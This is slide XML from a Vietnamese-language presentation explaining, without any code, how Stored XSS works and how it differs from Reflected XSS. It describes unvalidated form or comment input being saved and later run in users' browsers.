          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800" b="1" dirty="0"/>
              <a:t>Khác với Reflected tấn công trực tiếp vào một số nạn nhân mà hacker nhắm đến, Stored XSS hướng đến nhiều nạn nhân hơn. Lỗi này xảy ra khi ứng dụng web không kiểm tra kỹ các dữ liệu đầu vào trước khi lưu vào cơ sở dữ liệu (ở đây tôi dùng khái niệm này để chỉ database, file hay những khu vực khác nhằm lưu trữ dữ liệu của ứng dụng web). Ví dụ như các form góp ý, các comment … trên các trang web.</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2800" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="vi-VN"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57300" y="1229360"/>
            <a:ext cx="9676765" cy="4399915"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Với kỹ thuật Stored XSS , hacker không khai thác trực tiếp mà phải thực hiện tối thiểu qua 2 bước.</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2800" b="1" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Đầu tiên hacker sẽ thông qua các điểm đầu vào (form, input, textarea…) không được kiểm tra kỹ để chèn vào CSDL các đoạn mã nguy hiểm.</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2800" b="1" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Tiếp theo, khi người dùng truy cập vào ứng dụng web và thực hiện các thao tác liên quan đến dữ liệu được lưu này, đoạn mã của hacker sẽ được thực thi trên trình duyệt người dùng</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2800" b="1" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-US" sz="280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tored-xss-scenario1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1343025" y="685800"/>
            <a:ext cx="9505950" cy="5486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3617</Words>
  <Application>WPS Presentation</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>63</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Noto Sans</vt:lpstr>
      <vt:lpstr>Segoe Print</vt:lpstr>
      <vt:lpstr>Times New Roman</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lequy</dc:creator>
  <cp:lastModifiedBy>root</cp:lastModifiedBy>
  <cp:revision>16</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-02-11T07:36:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-02-14T13:22:53Z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03B6B33D73C64B538DA09232B9080FA3</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="KSOProductBuildVer">
    <vt:lpwstr>1033-11.2.0.11440</vt:lpwstr>
  </property>
</Properties>
</file>